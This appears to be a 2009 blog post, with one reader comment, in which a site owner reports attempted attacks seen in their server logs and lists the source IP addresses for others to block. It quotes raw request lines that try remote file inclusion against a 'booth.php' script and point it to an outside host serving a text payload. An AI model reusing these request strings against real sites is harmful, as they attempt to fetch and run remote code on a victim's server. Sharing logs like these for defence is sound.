Hey guys, in the last couple of weeks, I have noticed a couple of ip addresses trying to hack my website. I searched the net however I could not come up with anything (if you know anythina about these reqeusts posted below please comment). All these request have the form of some poll php script (I’m assuming its an exploit in this script) and ends with id1.txt.
Here are a couple of actual examples:
208.76.222.178 – – [20/Mar/2009:03:25:04 -0600] “GET /?p=230//booth.php?include_path=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1” 302 709 “-” “Mozilla/5.0”
208.76.222.178 – – [20/Mar/2009:03:25:04 -0600] “GET //booth.php?include_path=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1” 404 27617 “-” “Mozilla/5.0”
208.76.222.178 – – [20/Mar/2009:03:25:04 -0600] “GET /?tag=bluehost//booth.php?include_path=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1” 200 29492 “-” “Mozilla/5.0”
I have then blocked all of those ip addresses, and contacted the responsible hosts. Hopefully they will do something about it, also I think these servers have just been hijacked (probably with the same mysql injection they are trying to pull on me). Anyways I hope this helps the web, even though it’s on a tiny scale, we can battle these people! Here are all the ips below that you might want to block from your website:
| 208.76.222.178 |
| 65.44.220.102 |
| 217.21.209.8 |
| 82.179.197.134 |
| 211.202.2.220 |
| 64.34.177.190 |
| 66.147.243.115 |
| 69.89.31.222 |
I’m finding these as well. But I have given up blocking ip addresses, as they are always just proxies, so it makes no difference. Just make sure the code you build your sites with is unique. These exploits can only work on KNOWN software.